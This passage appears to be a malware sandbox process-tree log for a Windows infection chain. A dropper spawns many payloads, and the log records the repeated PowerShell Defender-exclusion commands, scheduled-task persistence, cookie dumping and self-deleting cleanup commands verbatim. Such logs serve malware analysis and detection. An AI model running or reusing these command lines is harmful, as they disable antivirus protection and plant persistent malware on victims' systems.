    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8144
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3192
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6836
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:792
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5800
- - C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:7392
  - - C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\AdvancedRun.exe" /SpecialRun 4101d8 7392
      4⤵
      PID:5128
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3556
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:7912
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:6888
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6968
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7088
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6844
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7212
- - C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:5792
  - - C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\ff0244e2-ee19-4402-ae58-77de36462106\AdvancedRun.exe" /SpecialRun 4101d8 5792
      4⤵
      PID:6244
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7844
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:7108
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:4604
- C:\Users\Admin\AppData\Roaming\jwtwjbt
  C:\Users\Admin\AppData\Roaming\jwtwjbt
  2⤵
  - Suspicious use of SetThreadContext
  PID:4896
- - C:\Users\Admin\AppData\Roaming\jwtwjbt
    C:\Users\Admin\AppData\Roaming\jwtwjbt
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:3800
- C:\Windows\system32\rundll32.exe
  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\NXfSHgjpzLhX\NXfSHgjpzLhX.dll",NXfSHgjpzLhX
  2⤵
  - Windows security modification
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:7012
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  PID:3684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4228
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:568
- C:\Users\Admin\AppData\Local\Temp\is-RHJDS.tmp\Install.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-RHJDS.tmp\Install.tmp" /SL5="$301DA,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Users\Admin\AppData\Local\Temp\is-HU5RM.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-HU5RM.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Program Files\Common Files\RORKYZRGJV\ultramediaburner.exe
      "C:\Program Files\Common Files\RORKYZRGJV\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2100
    - - C:\Users\Admin\AppData\Local\Temp\is-JVNE8.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JVNE8.tmp\ultramediaburner.tmp" /SL5="$7002E,281924,62464,C:\Program Files\Common Files\RORKYZRGJV\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1580
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:1552
  - - C:\Users\Admin\AppData\Local\Temp\88-c5761-930-4dca5-d794f5fc5bd78\Lulevugodu.exe
      "C:\Users\Admin\AppData\Local\Temp\88-c5761-930-4dca5-d794f5fc5bd78\Lulevugodu.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of AdjustPrivilegeToken
      PID:4052
  - - C:\Users\Admin\AppData\Local\Temp\7c-cb544-0bf-48597-f1b23c079e308\SHyqaefepynae.exe
      "C:\Users\Admin\AppData\Local\Temp\7c-cb544-0bf-48597-f1b23c079e308\SHyqaefepynae.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\snvkmbwt.u4w\KiffMainE1.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3792
      - C:\Users\Admin\AppData\Local\Temp\snvkmbwt.u4w\KiffMainE1.exe
        
        C:\Users\Admin\AppData\Local\Temp\snvkmbwt.u4w\KiffMainE1.exe
        6⤵
        
        PID:4256
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gsbjint.gkv\001.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4204
      - C:\Users\Admin\AppData\Local\Temp\5gsbjint.gkv\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\5gsbjint.gkv\001.exe
        6⤵
        Executes dropped EXE
        
        PID:4496
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5de4e2gi.24h\download.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4404
      - C:\Users\Admin\AppData\Local\Temp\5de4e2gi.24h\download.exe
        
        C:\Users\Admin\AppData\Local\Temp\5de4e2gi.24h\download.exe
        6⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:5048
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 5048 & erase C:\Users\Admin\AppData\Local\Temp\svchost.exe & RD /S /Q C:\\ProgramData\\452689150367893\\* & exit
        8⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 5048
        9⤵
        Kills process with taskkill
        
        PID:4668
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4456
      - C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\installer.exe /qn CAMPAIGN="654"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4644
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gtqnhxsr.wmr\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619983798 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:5636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ieywgiyd.rrs\gpooe.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4920
      - C:\Users\Admin\AppData\Local\Temp\ieywgiyd.rrs\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\ieywgiyd.rrs\gpooe.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:2932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\suqvcyje.ede\google-game.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4756
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4600
      - C:\Users\Admin\AppData\Local\Temp\suqvcyje.ede\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\suqvcyje.ede\google-game.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2196
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        7⤵
        Loads dropped DLL
        
        PID:2432
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycofe4e5.kjk\jg8_mysu.exe & exit
        5⤵
        
        PID:4740
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4256
      - C:\Users\Admin\AppData\Local\Temp\ycofe4e5.kjk\jg8_mysu.exe
        
        C:\Users\Admin\AppData\Local\Temp\ycofe4e5.kjk\jg8_mysu.exe
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:5248
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\raorbemu.asg\huesaa.exe & exit
        5⤵
        
        PID:5316
      - C:\Users\Admin\AppData\Local\Temp\raorbemu.asg\huesaa.exe
        
        C:\Users\Admin\AppData\Local\Temp\raorbemu.asg\huesaa.exe
        6⤵
        Executes dropped EXE
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
